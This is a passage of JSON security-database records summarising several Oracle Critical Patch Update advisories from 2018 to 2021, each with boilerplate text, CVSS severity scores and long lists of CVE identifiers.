"CVE-2021-22926", "CVE-2021-35596", "CVE-2020-1967", "CVE-2021-35660", "CVE-2021-36374", "CVE-2021-35557", "CVE-2020-7065", "CVE-2021-35654", "CVE-2021-35584", "CVE-2021-35603", "CVE-2020-27193", "CVE-2021-35593", "CVE-2021-35608", "CVE-2017-5645", "CVE-2021-27290", "CVE-2021-35541", "CVE-2018-20843", "CVE-2021-21702", "CVE-2020-11111", "CVE-2021-37695", "CVE-2020-36183", "CVE-2021-23926", "CVE-2021-35572", "CVE-2021-35559", "CVE-2018-20033", "CVE-2020-29661", "CVE-2021-2432", "CVE-2021-22696", "CVE-2021-35653", "CVE-2021-2414", "CVE-2021-35582", "CVE-2019-12415", "CVE-2021-35591", "CVE-2021-34558", "CVE-2020-5398", "CVE-2020-25648", "CVE-2021-35560", "CVE-2021-2351", "CVE-2021-35546", "CVE-2020-6950", "CVE-2021-35631", "CVE-2020-28500", "CVE-2021-31811", "CVE-2018-10237", "CVE-2020-14060", "CVE-2021-23017", "CVE-2020-36189", "CVE-2021-22922", "CVE-2021-35556", "CVE-2021-22112", "CVE-2016-6794", "CVE-2021-35540", "CVE-2020-36179", "CVE-2021-35632", "CVE-2020-13956", "CVE-2020-14062", "CVE-2021-21347", "CVE-2021-35549", "CVE-2021-35581", "CVE-2021-25329", "CVE-2021-32803", "CVE-2021-35562", "CVE-2018-11040", "CVE-2021-21343", "CVE-2021-2369", "CVE-2021-35630", "CVE-2016-6797", "CVE-2020-9546", "CVE-2021-34428", "CVE-2020-10968", "CVE-2021-35639", "CVE-2020-10878", "CVE-2021-2474", "CVE-2021-26690", "CVE-2021-27906", "CVE-2020-8908", "CVE-2016-1000031", "CVE-2021-22883", "CVE-2021-35576", "CVE-2020-14195", "CVE-2019-0227", "CVE-2020-24977", "CVE-2021-35629", "CVE-2021-25215", "CVE-2021-21290", "CVE-2021-23337", "CVE-2020-10969", "CVE-2021-35652", "CVE-2021-29505", "CVE-2021-35640", "CVE-2020-9547", "CVE-2021-39135"], "modified": "2022-01-18T00:00:00", "id": "ORACLE:CPUOCT2021", "href": "https://www.oracle.com/security-alerts/cpuoct2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:22", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 301 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2456979.1>).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-12-18T00:00:00", "title": "Oracle Critical Patch Update - October 2018", "type": "oracle", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3170", "CVE-2018-3157", "CVE-2018-3138", "CVE-2018-3254", "CVE-2017-5533", "CVE-2018-3204", "CVE-2018-3141", "CVE-2017-7407", "CVE-2015-9251", "CVE-2016-8620", "CVE-2017-9798", "CVE-2016-8623", "CVE-2018-1000120", "CVE-2016-5244", "CVE-2018-0732", "CVE-2018-3183", "CVE-2015-0235", "CVE-2016-5420", "CVE-2018-3274", "CVE-2018-3271", "CVE-2018-1304", "CVE-2018-3297", "CVE-2018-3130", "CVE-2016-9840", "CVE-2018-3184", "CVE-2018-3227", "CVE-2018-3231", "CVE-2016-8615", "CVE-2016-8616", "CVE-2018-3188", "CVE-2018-3137", "CVE-2018-3174", "CVE-2018-3203", "CVE-2018-3154", "CVE-2016-5019", "CVE-2016-8619", "CVE-2015-3236", "CVE-2018-3189", "CVE-2018-1275", "CVE-2018-14048", "CVE-2018-3301", "CVE-2018-3294", "CVE-2018-3129", "CVE-2018-7489", "CVE-2018-3287", "CVE-2018-3180", "CVE-2018-3257", "CVE-2018-3280", "CVE-2018-3293", "CVE-2018-3247", "CVE-2018-3239", "CVE-2018-2911", "CVE-2018-3270", "CVE-2018-3249", "CVE-2018-3259", "CVE-2018-3167", "CVE-2018-3236", "CVE-2018-3292", "CVE-2017-3735", "CVE-2018-2912", "CVE-2018-3175", "CVE-2018-3250", "CVE-2014-0014", "CVE-2018-3299", "CVE-2018-1271", "CVE-2016-5080", "CVE-2018-3256", "CVE-2018-3136", "CVE-2018-3246", "CVE-2018-3152", "CVE-2016-8618", "CVE-2018-1000121", "CVE-2018-3285", "CVE-2018-3115", "CVE-2018-3263", "CVE-2018-11039", "CVE-2018-3282", "CVE-2018-3218", "CVE-2018-3150", "CVE-2018-3145", "CVE-2018-3132", "CVE-2018-3190", "CVE-2016-7141", "CVE-2018-3220", "CVE-2018-11307", "CVE-2018-3133", "CVE-2018-2889", "CVE-2018-3128", "CVE-2018-3214", "CVE-2018-3182", "CVE-2018-3211", "CVE-2018-3210", "CVE-2016-0729", "CVE-2018-3233", "CVE-2018-3209", "CVE-2018-3131", "CVE-2018-3302", "CVE-2016-0635", "CVE-2016-0755", "CVE-2016-2107", "CVE-2018-3267", "CVE-2018-3261", "CVE-2015-7501", "CVE-2018-3219", "CVE-2018-3291", "CVE-2018-3244", "CVE-2018-3265", "CVE-2018-3266", "CVE-2018-3193", "CVE-2018-3144", "CVE-2018-3206", "CVE-2018-3298", "CVE-2016-8617", "CVE-2016-9842", "CVE-2018-12022", "CVE-2018-3212", "CVE-2018-8014", "CVE-2016-1182", "CVE-2015-3153", "CVE-2018-1258", "CVE-2018-3234", "CVE-2018-3255", "CVE-2018-3226", "CVE-2018-1000122", "CVE-2018-3173", "CVE-2018-3215", "CVE-2018-3248", "CVE-2018-1305", "CVE-2018-3187", "CVE-2018-3276", "CVE-2018-3156", "CVE-2018-3241", "CVE-2018-3228", "CVE-2018-11776", "CVE-2018-3122", "CVE-2018-13785", "CVE-2018-3011", "CVE-2018-3139", "CVE-2017-7805", "CVE-2018-3223", "CVE-2018-3205", "CVE-2018-3230", "CVE-2018-1257", "CVE-2018-3213", "CVE-2017-5715", "CVE-2018-3161", "CVE-2018-3290", "CVE-2018-3201", "CVE-2018-1000300", "CVE-2018-3251", "CVE-2018-3225", "CVE-2018-2902", "CVE-2018-3163", "CVE-2015-3144", "CVE-2018-2887", "CVE-2014-0114", "CVE-2018-3179", "CVE-2018-3262", "CVE-2018-3237", "CVE-2018-0739", "CVE-2018-3222", "CVE-2018-3155", "CVE-2015-0252", "CVE-2018-3253", "CVE-2018-3126", "CVE-2018-8034", "CVE-2018-3127", "CVE-2018-3221", "CVE-2018-3059", "CVE-2015-3237", "CVE-2018-3279", "CVE-2018-3151", "CVE-2018-2909", "CVE-2018-3245", "CVE-2018-3252", "CVE-2018-3284", "CVE-2018-8013", "CVE-2018-3235", "CVE-2016-8622", "CVE-2018-3275", "CVE-2015-7990", "CVE-2018-3162", "CVE-2018-3197", "CVE-2018-1272", "CVE-2018-3278", "CVE-2018-3186", "CVE-2017-7525", "CVE-2018-3159", "CVE-2018-3171", "CVE-2018-3296", "CVE-2018-3194", "CVE-2018-3217", "CVE-2018-3273", "CVE-2018-3178", "CVE-2018-3147", "CVE-2018-3288", "CVE-2018-1270", "CVE-2014-7817", "CVE-2018-3191", "CVE-2018-18224", "CVE-2012-1007", "CVE-2018-3143", "CVE-2016-8624", "CVE-2018-0733", "CVE-2016-1181", "CVE-2018-3281", "CVE-2018-2971", "CVE-2016-3739", "CVE-2018-3146", "CVE-2016-9843", "CVE-2018-3277", "CVE-2018-3208", "CVE-2017-14735", "CVE-2015-3145", "CVE-2017-3738", "CVE-2018-3172", "CVE-2018-3164", "CVE-2018-3176", "CVE-2018-3169", "CVE-2018-3160", "CVE-2018-3149", "CVE-2014-3490", "CVE-2018-3185", "CVE-2018-3232", "CVE-2018-3264", "CVE-2018-8037", "CVE-2018-3258", "CVE-2017-5645", "CVE-2016-5421", "CVE-2016-9586", "CVE-2018-3272", "CVE-2018-3142", "CVE-2018-3295", "CVE-2018-2914", "CVE-2018-3192", "CVE-2018-3153", "CVE-2018-3283", "CVE-2017-5529", "CVE-2018-3269", "CVE-2016-9841", "CVE-2018-3196", "CVE-2016-4000", "CVE-2018-3289", "CVE-2018-3229", "CVE-2017-3736", "CVE-2018-3286", "CVE-2018-3177", "CVE-2018-3243", "CVE-2018-3242", "CVE-2018-3148", "CVE-2018-3181", "CVE-2018-18223", "CVE-2018-0737", "CVE-2018-3268", "CVE-2018-3200", "CVE-2016-5419", "CVE-2018-3195", "CVE-2017-15095", "CVE-2016-7167", "CVE-2018-11040", "CVE-2018-3198", "CVE-2018-3166", "CVE-2016-6814", "CVE-2018-3202", "CVE-2016-1000031", "CVE-2018-3158", "CVE-2018-1000301", "CVE-2018-3238", "CVE-2018-3134", "CVE-2018-12023", "CVE-2018-3224", "CVE-2018-3165", "CVE-2016-8621", "CVE-2018-3135", "CVE-2018-3168", "CVE-2015-6937", "CVE-2018-2922", "CVE-2018-3140", "CVE-2018-2913", "CVE-2018-3207"], "modified": "2018-10-16T00:00:00", "id": "ORACLE:CPUOCT2018", "href": "https://www.oracle.com/security-alerts/cpuoct2018.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:59:13", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 444 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2684313.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501", "CVE-2015-8607", "CVE-2015-8608", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1923", "CVE-2016-1924", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3183", "CVE-2016-4000", "CVE-2016-4796", "CVE-2016-4797", "CVE-2016-5017", "CVE-2016-5019", "CVE-2016-6306", "CVE-2016-6814", "CVE-2016-8332", "CVE-2016-8610", "CVE-2016-9112", "CVE-2016-9840", "CVE-2016-9841", "CVE-2016-9842", "CVE-2016-9843", "CVE-2017-0861", "CVE-2017-10140", "CVE-2017-12610", "CVE-2017-12626", "CVE-2017-12814", "CVE-2017-12837", "CVE-2017-12883", "CVE-2017-15265", "CVE-2017-15708", "CVE-2017-5637", "CVE-2017-5645", "CVE-2018-1000004", "CVE-2018-1000632", "CVE-2018-10237", "CVE-2018-10675", "CVE-2018-10872", "CVE-2018-10901", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11776", "CVE-2018-1199", "CVE-2018-12015", "CVE-2018-12023", "CVE-2018-12207", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-1288", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17190", "CVE-2018-17196", "CVE-2018-18311", "CVE-2018-18312", "CVE-2018-18313", "CVE-2018-18314", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-3693", "CVE-2018-5390", "CVE-2018-6616", "CVE-2018-6797", "CVE-2018-6798", "CVE-2018-6913", "CVE-2018-7566", "CVE-2018-8012", "CVE-2018-8013", "CVE-2018-8032", "CVE-2018-8088", "CVE-2019-0188", "CVE-2019-0201", "CVE-2019-0220", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10192", "CVE-2019-10193", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12973", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14862", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1551", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-16056", "CVE-2019-16335", "CVE-2019-16935", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17560", "CVE-2019-17561", "CVE-2019-17563", "CVE-2019-17569", "CVE-2019-17571", "CVE-2019-17573", "CVE-2019-19956", "CVE-2019-20330", "CVE-2019-20388", "CVE-2019-2094", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5427", "CVE-2019-5489", "CVE-2019-8457", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-14527", "CVE-2020-14528", "CVE-2020-14529", "CVE-2020-14530", "CVE-2020-14531", "CVE-2020-14532", "CVE-2020-14533", "CVE-2020-14534", "CVE-2020-14535", "CVE-2020-14536", "CVE-2020-14537", "CVE-2020-14539", "CVE-2020-14540", "CVE-2020-14541", "CVE-2020-14542", "CVE-2020-14543", "CVE-2020-14544", "CVE-2020-14545", "CVE-2020-14546", "CVE-2020-14547", "CVE-2020-14548", "CVE-2020-14549", "CVE-2020-14550", "CVE-2020-14551", "CVE-2020-14552", "CVE-2020-14553", "CVE-2020-14554", "CVE-2020-14555", "CVE-2020-14556", "CVE-2020-14557", "CVE-2020-14558", "CVE-2020-14559", "CVE-2020-14560", "CVE-2020-14561", "CVE-2020-14562", "CVE-2020-14563", "CVE-2020-14564", "CVE-2020-14565", "CVE-2020-14566", "CVE-2020-14567", "CVE-2020-14568", "CVE-2020-14569", "CVE-2020-14570", "CVE-2020-14571", "CVE-2020-14572", "CVE-2020-14573", "CVE-2020-14574", "CVE-2020-14575", "CVE-2020-14576", "CVE-2020-14577", "CVE-2020-14578", "CVE-2020-14579", "CVE-2020-14580", "CVE-2020-14581", "CVE-2020-14582", "CVE-2020-14583", "CVE-2020-14584", "CVE-2020-14585", "CVE-2020-14586", "CVE-2020-14587", "CVE-2020-14588", "CVE-2020-14589", "CVE-2020-14590", "CVE-2020-14591", "CVE-2020-14592", "CVE-2020-14593", "CVE-2020-14594", "CVE-2020-14595", "CVE-2020-14596", "CVE-2020-14597", "CVE-2020-14598", "CVE-2020-14599", "CVE-2020-14600", "CVE-2020-14601", "CVE-2020-14602", "CVE-2020-14603", "CVE-2020-14604", "CVE-2020-14605", "CVE-2020-14606", "CVE-2020-14607", "CVE-2020-14608", "CVE-2020-14609", "CVE-2020-14610", "CVE-2020-14611", "CVE-2020-14612", "CVE-2020-14613", "CVE-2020-14614", "CVE-2020-14615", "CVE-2020-14616", "CVE-2020-14617", "CVE-2020-14618", "CVE-2020-14619", "CVE-2020-14620", "CVE-2020-14621", "CVE-2020-14622", "CVE-2020-14623", "CVE-2020-14624", "CVE-2020-14625", "CVE-2020-14626", "CVE-2020-14627", "CVE-2020-14628", "CVE-2020-14629", "CVE-2020-14630", "CVE-2020-14631", "CVE-2020-14632", "CVE-2020-14633", "CVE-2020-14634", "CVE-2020-14635", "CVE-2020-14636", "CVE-2020-14637", "CVE-2020-14638", "CVE-2020-14639", "CVE-2020-14640", "CVE-2020-14641", "CVE-2020-14642", "CVE-2020-14643", "CVE-2020-14644", "CVE-2020-14645", "CVE-2020-14646", "CVE-2020-14647", "CVE-2020-14648", "CVE-2020-14649", "CVE-2020-14650", "CVE-2020-14651", "CVE-2020-14652", "CVE-2020-14653", "CVE-2020-14654", "CVE-2020-14655", "CVE-2020-14656", "CVE-2020-14657", "CVE-2020-14658", "CVE-2020-14659", "CVE-2020-14660", "CVE-2020-14661", "CVE-2020-14662", "CVE-2020-14663", "CVE-2020-14664", "CVE-2020-14665", "CVE-2020-14666", "CVE-2020-14667", "CVE-2020-14668", "CVE-2020-14669", "CVE-2020-14670", "CVE-2020-14671", "CVE-2020-14673", "CVE-2020-14674", "CVE-2020-14675", "CVE-2020-14676", "CVE-2020-14677", "CVE-2020-14678", "CVE-2020-14679", "CVE-2020-14680", "CVE-2020-14681", "CVE-2020-14682", "CVE-2020-14684", "CVE-2020-14685", "CVE-2020-14686", "CVE-2020-14687", "CVE-2020-14688", "CVE-2020-14690", "CVE-2020-14691", "CVE-2020-14692", "CVE-2020-14693", "CVE-2020-14694", "CVE-2020-14695", "CVE-2020-14696", "CVE-2020-14697", "CVE-2020-14698", "CVE-2020-14699", "CVE-2020-14700", "CVE-2020-14701", "CVE-2020-14702", "CVE-2020-14703", "CVE-2020-14704", "CVE-2020-14705", "CVE-2020-14706", "CVE-2020-14707", "CVE-2020-14708", "CVE-2020-14709", "CVE-2020-14710", "CVE-2020-14711", "CVE-2020-14712", "CVE-2020-14713", "CVE-2020-14714", "CVE-2020-14715", "CVE-2020-14716", "CVE-2020-14717", "CVE-2020-14718", "CVE-2020-14719", "CVE-2020-14720", "CVE-2020-14721", "CVE-2020-14722", "CVE-2020-14723", "CVE-2020-14724", "CVE-2020-14725", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1967", "CVE-2020-2513", "CVE-2020-2555", "CVE-2020-2562", "CVE-2020-2966", "CVE-2020-2967", "CVE-2020-2968", "CVE-2020-2969", "CVE-2020-2971", "CVE-2020-2972", "CVE-2020-2973", "CVE-2020-2974", "CVE-2020-2975", "CVE-2020-2976", "CVE-2020-2977", "CVE-2020-2978", "CVE-2020-2981", "CVE-2020-2982", "CVE-2020-2983", "CVE-2020-2984", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-6851", "CVE-2020-7059", "CVE-2020-7060", "CVE-2020-7595", "CVE-2020-8112", "CVE-2020-8172", "CVE-2020-9327", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-01T00:00:00", "id": "ORACLE:CPUJUL2020", "href": "https://www.oracle.com/security-alerts/cpujul2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:59:02", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 334 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2627487.1>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1695", "CVE-2012-3135", "CVE-2014-3004", "CVE-2014-3596", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2183", "CVE-2016-4000", "CVE-2016-5019", "CVE-2016-6306", "CVE-2016-6814", "CVE-2016-8610", "CVE-2017-1000376", "CVE-2017-12626", "CVE-2017-14735", "CVE-2017-15708", "CVE-2017-15906", "CVE-2017-5645", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-1000030", "CVE-2018-1060", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-11759", "CVE-2018-11784", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-14718", "CVE-2018-15473", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-16395", "CVE-2018-17189", "CVE-2018-19362", "CVE-2018-20684", "CVE-2018-5407", "CVE-2018-6829", "CVE-2018-8032", "CVE-2018-8039", "CVE-2019-0199", "CVE-2019-0215", "CVE-2019-0221", "CVE-2019-0227", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10098", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12814", "CVE-2019-13117", "CVE-2019-13118", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1559", "CVE-2019-1563", "CVE-2019-15845", "CVE-2019-16168", "CVE-2019-16201", "CVE-2019-16254", "CVE-2019-16255", "CVE-2019-16335", "CVE-2019-16775", "CVE-2019-16776", "CVE-2019-16777", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-2094", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2904", "CVE-2019-3862", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-5718", "CVE-2019-8457", "CVE-2019-9208", "CVE-2019-9579", "CVE-2019-9636", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-2510", "CVE-2020-2511", "CVE-2020-2512", "CVE-2020-2515", "CVE-2020-2516", "CVE-2020-2517", "CVE-2020-2518", "CVE-2020-2519", "CVE-2020-2527", "CVE-2020-2530", "CVE-2020-2531", "CVE-2020-2533", "CVE-2020-2534", "CVE-2020-2535", "CVE-2020-2536", "CVE-2020-2537", "CVE-2020-2538", "CVE-2020-2539", "CVE-2020-2540", "CVE-2020-2541", "CVE-2020-2542", "CVE-2020-2543", "CVE-2020-2544", "CVE-2020-2545", "CVE-2020-2546", "CVE-2020-2547", "CVE-2020-2548", "CVE-2020-2549", "CVE-2020-2550", "CVE-2020-2551", "CVE-2020-2552", "CVE-2020-2555", "CVE-2020-2556", "CVE-2020-2557", "CVE-2020-2558", "CVE-2020-2559", "CVE-2020-2560", "CVE-2020-2561", "CVE-2020-2563", "CVE-2020-2564", "CVE-2020-2565", "CVE-2020-2566", "CVE-2020-2567", "CVE-2020-2568", "CVE-2020-2569", "CVE-2020-2570", "CVE-2020-2571", "CVE-2020-2572", "CVE-2020-2573", "CVE-2020-2574", "CVE-2020-2576", "CVE-2020-2577", "CVE-2020-2578", "CVE-2020-2579", "CVE-2020-2580", "CVE-2020-2581", "CVE-2020-2582", "CVE-2020-2583", "CVE-2020-2584", "CVE-2020-2585", "CVE-2020-2586", "CVE-2020-2587", "CVE-2020-2588", "CVE-2020-2589", "CVE-2020-2590", "CVE-2020-2591", "CVE-2020-2592", "CVE-2020-2593", "CVE-2020-2595", "CVE-2020-2596", "CVE-2020-2597", "CVE-2020-2598", "CVE-2020-2599", "CVE-2020-2600", "CVE-2020-2601", "CVE-2020-2602", "CVE-2020-2603", "CVE-2020-2604", "CVE-2020-2605", "CVE-2020-2606", "CVE-2020-2607", "CVE-2020-2608", "CVE-2020-2609", "CVE-2020-2610", "CVE-2020-2611", "CVE-2020-2612", "CVE-2020-2613", "CVE-2020-2614", "CVE-2020-2615", "CVE-2020-2616", "CVE-2020-2617", "CVE-2020-2618", "CVE-2020-2619", "CVE-2020-2620", "CVE-2020-2621", "CVE-2020-2622", "CVE-2020-2623", "CVE-2020-2624", "CVE-2020-2625", "CVE-2020-2626", "CVE-2020-2627", "CVE-2020-2628", "CVE-2020-2629", "CVE-2020-2630", "CVE-2020-2631", "CVE-2020-2632", "CVE-2020-2633", "CVE-2020-2634", "CVE-2020-2635", "CVE-2020-2636", "CVE-2020-2637", "CVE-2020-2638", "CVE-2020-2639", "CVE-2020-2640", "CVE-2020-2641", "CVE-2020-2642", "CVE-2020-2643", "CVE-2020-2644", "CVE-2020-2645", "CVE-2020-2646", "CVE-2020-2647", "CVE-2020-2648", "CVE-2020-2649", "CVE-2020-2650", "CVE-2020-2651", "CVE-2020-2652", "CVE-2020-2653", "CVE-2020-2654", "CVE-2020-2655", "CVE-2020-2656", "CVE-2020-2657", "CVE-2020-2658", "CVE-2020-2659", "CVE-2020-2660", "CVE-2020-2661", "CVE-2020-2662", "CVE-2020-2663", "CVE-2020-2664", "CVE-2020-2665", "CVE-2020-2666", "CVE-2020-2667", "CVE-2020-2668", "CVE-2020-2669", "CVE-2020-2670", "CVE-2020-2671", "CVE-2020-2672", "CVE-2020-2673", "CVE-2020-2674", "CVE-2020-2675", "CVE-2020-2676", "CVE-2020-2677", "CVE-2020-2678", "CVE-2020-2679", "CVE-2020-2680", "CVE-2020-2681", "CVE-2020-2682", "CVE-2020-2683", "CVE-2020-2684", 